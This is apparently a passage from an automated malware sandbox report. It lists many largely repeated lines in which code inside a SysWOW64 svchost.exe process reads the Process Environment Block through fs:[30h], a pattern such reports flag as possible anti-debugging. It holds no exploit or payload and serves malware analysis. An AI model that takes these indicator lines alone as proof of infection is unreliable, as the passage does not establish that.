Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]	2_2_02FB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]	2_2_02FB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]	2_2_02FB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]	2_2_02F2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]	2_2_02F2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]	2_2_02F2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F70185 mov eax, dword ptr fs:[00000030h]	2_2_02F70185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FEC188 mov eax, dword ptr fs:[00000030h]	2_2_02FEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FEC188 mov eax, dword ptr fs:[00000030h]	2_2_02FEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD4180 mov eax, dword ptr fs:[00000030h]	2_2_02FD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD4180 mov eax, dword ptr fs:[00000030h]	2_2_02FD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2C156 mov eax, dword ptr fs:[00000030h]	2_2_02F2C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC8158 mov eax, dword ptr fs:[00000030h]	2_2_02FC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36154 mov eax, dword ptr fs:[00000030h]	2_2_02F36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36154 mov eax, dword ptr fs:[00000030h]	2_2_02F36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]	2_2_02FC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]	2_2_02FC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC4144 mov ecx, dword ptr fs:[00000030h]	2_2_02FC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]	2_2_02FC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]	2_2_02FC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F60124 mov eax, dword ptr fs:[00000030h]	2_2_02F60124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDA118 mov ecx, dword ptr fs:[00000030h]	2_2_02FDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]	2_2_02FDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]	2_2_02FDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]	2_2_02FDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF0115 mov eax, dword ptr fs:[00000030h]	2_2_02FF0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_02FAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_02FAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_02FAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_02FAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB06F1 mov eax, dword ptr fs:[00000030h]	2_2_02FB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB06F1 mov eax, dword ptr fs:[00000030h]	2_2_02FB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_02F6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A6C7 mov eax, dword ptr fs:[00000030h]	2_2_02F6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F666B0 mov eax, dword ptr fs:[00000030h]	2_2_02F666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6C6A6 mov eax, dword ptr fs:[00000030h]	2_2_02F6C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F34690 mov eax, dword ptr fs:[00000030h]	2_2_02F34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F34690 mov eax, dword ptr fs:[00000030h]	2_2_02F34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F62674 mov eax, dword ptr fs:[00000030h]	2_2_02F62674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF866E mov eax, dword ptr fs:[00000030h]	2_2_02FF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF866E mov eax, dword ptr fs:[00000030h]	2_2_02FF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A660 mov eax, dword ptr fs:[00000030h]	2_2_02F6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A660 mov eax, dword ptr fs:[00000030h]	2_2_02F6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4C640 mov eax, dword ptr fs:[00000030h]	2_2_02F4C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4E627 mov eax, dword ptr fs:[00000030h]	2_2_02F4E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F66620 mov eax, dword ptr fs:[00000030h]	2_2_02F66620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F68620 mov eax, dword ptr fs:[00000030h]	2_2_02F68620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3262C mov eax, dword ptr fs:[00000030h]	2_2_02F3262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72619 mov eax, dword ptr fs:[00000030h]	2_2_02F72619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE609 mov eax, dword ptr fs:[00000030h]	2_2_02FAE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]	2_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]	2_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]	2_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]	2_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]	2_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]	2_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]	2_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F347FB mov eax, dword ptr fs:[00000030h]	2_2_02F347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F347FB mov eax, dword ptr fs:[00000030h]	2_2_02F347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]	2_2_02F527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]	2_2_02F527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]	2_2_02F527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBE7E1 mov eax, dword ptr fs:[00000030h]	2_2_02FBE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3C7C0 mov eax, dword ptr fs:[00000030h]	2_2_02F3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB07C3 mov eax, dword ptr fs:[00000030h]	2_2_02FB07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F307AF mov eax, dword ptr fs:[00000030h]	2_2_02F307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD678E mov eax, dword ptr fs:[00000030h]	2_2_02FD678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F38770 mov eax, dword ptr fs:[00000030h]	2_2_02F38770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F30750 mov eax, dword ptr fs:[00000030h]	2_2_02F30750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBE75D mov eax, dword ptr fs:[00000030h]	2_2_02FBE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72750 mov eax, dword ptr fs:[00000030h]	2_2_02F72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72750 mov eax, dword ptr fs:[00000030h]	2_2_02F72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB4755 mov eax, dword ptr fs:[00000030h]	2_2_02FB4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6674D mov esi, dword ptr fs:[00000030h]	2_2_02F6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6674D mov eax, dword ptr fs:[00000030h]	2_2_02F6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6674D mov eax, dword ptr fs:[00000030h]	2_2_02F6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6273C mov eax, dword ptr fs:[00000030h]	2_2_02F6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6273C mov ecx, dword ptr fs:[00000030h]	2_2_02F6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6273C mov eax, dword ptr fs:[00000030h]	2_2_02F6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAC730 mov eax, dword ptr fs:[00000030h]	2_2_02FAC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6C720 mov eax, dword ptr fs:[00000030h]	2_2_02F6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6C720 mov eax, dword ptr fs:[00000030h]	2_2_02F6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F30710 mov eax, dword ptr fs:[00000030h]	2_2_02F30710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F60710 mov eax, dword ptr fs:[00000030h]	2_2_02F60710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6C700 mov eax, dword ptr fs:[00000030h]	2_2_02F6C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]	2_2_03004500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]	2_2_03004500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]	2_2_03004500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]	2_2_03004500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]	2_2_03004500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]	2_2_03004500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]	2_2_03004500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F304E5 mov ecx, dword ptr fs:[00000030h]	2_2_02F304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F644B0 mov ecx, dword ptr fs:[00000030h]	2_2_02F644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBA4B0 mov eax, dword ptr fs:[00000030h]	2_2_02FBA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F364AB mov eax, dword ptr fs:[00000030h]	2_2_02F364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]	2_2_02F5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]	2_2_02F5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]	2_2_02F5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBC460 mov ecx, dword ptr fs:[00000030h]	2_2_02FBC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2645D mov eax, dword ptr fs:[00000030h]	2_2_02F2645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5245A mov eax, dword ptr fs:[00000030h]	2_2_02F5245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]	2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]	2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]	2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]	2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]	2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]	2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]	2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]	2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A430 mov eax, dword ptr fs:[00000030h]	2_2_02F6A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]	2_2_02F2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]	2_2_02F2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]	2_2_02F2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2C427 mov eax, dword ptr fs:[00000030h]	2_2_02F2C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]	2_2_02FB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]	2_2_02FB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]	2_2_02FB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]	2_2_02FB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]	2_2_02FB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]	2_2_02FB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]	2_2_02FB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h]	2_2_02F68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h]	2_2_02F68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h]	2_2_02F68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F325E0 mov eax, dword ptr fs:[00000030h]	2_2_02F325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6C5ED mov eax, dword ptr fs:[00000030h]	2_2_02F6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6C5ED mov eax, dword ptr fs:[00000030h]	2_2_02F6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F365D0 mov eax, dword ptr fs:[00000030h]	2_2_02F365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]	2_2_02F6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]	2_2_02F6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E5CF mov eax, dword ptr fs:[00000030h]	2_2_02F6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E5CF mov eax, dword ptr fs:[00000030h]	2_2_02F6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F545B1 mov eax, dword ptr fs:[00000030h]	2_2_02F545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F545B1 mov eax, dword ptr fs:[00000030h]	2_2_02F545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h]	2_2_02FB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h]	2_2_02FB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h]	2_2_02FB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E59C mov eax, dword ptr fs:[00000030h]	2_2_02F6E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F32582 mov eax, dword ptr fs:[00000030h]	2_2_02F32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F32582 mov ecx, dword ptr fs:[00000030h]	2_2_02F32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F64588 mov eax, dword ptr fs:[00000030h]	2_2_02F64588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h]	2_2_02F6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h]	2_2_02F6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h]	2_2_02F6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F38550 mov eax, dword ptr fs:[00000030h]	2_2_02F38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F38550 mov eax, dword ptr fs:[00000030h]	2_2_02F38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]	2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]	2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]	2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]	2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]	2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]	2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]	2_2_02F5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]	2_2_02F5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]	2_2_02F5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]	2_2_02F5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]	2_2_02F5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC6500 mov eax, dword ptr fs:[00000030h]	2_2_02FC6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6AAEE mov eax, dword ptr fs:[00000030h]	2_2_02F6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6AAEE mov eax, dword ptr fs:[00000030h]	2_2_02F6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F30AD0 mov eax, dword ptr fs:[00000030h]	2_2_02F30AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F64AD0 mov eax, dword ptr fs:[00000030h]	2_2_02F64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F64AD0 mov eax, dword ptr fs:[00000030h]	2_2_02F64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h]	2_2_02F86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h]	2_2_02F86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h]	2_2_02F86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F38AA0 mov eax, dword ptr fs:[00000030h]	2_2_02F38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F38AA0 mov eax, dword ptr fs:[00000030h]	2_2_02F38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F86AA4 mov eax, dword ptr fs:[00000030h]	2_2_02F86AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F68A90 mov edx, dword ptr fs:[00000030h]	2_2_02F68A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]	2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]	2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]	2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]	2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]	2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]	2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]	2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]	2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]	2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FACA72 mov eax, dword ptr fs:[00000030h]	2_2_02FACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FACA72 mov eax, dword ptr fs:[00000030h]	2_2_02FACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h]	2_2_02F6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h]	2_2_02F6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h]	2_2_02F6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]	2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]	2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]	2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]	2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]	2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]	2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]	2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40A5B mov eax, dword ptr fs:[00000030h]	2_2_02F40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40A5B mov eax, dword ptr fs:[00000030h]	2_2_02F40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F54A35 mov eax, dword ptr fs:[00000030h]	2_2_02F54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F54A35 mov eax, dword ptr fs:[00000030h]	2_2_02F54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6CA38 mov eax, dword ptr fs:[00000030h]	2_2_02F6CA38
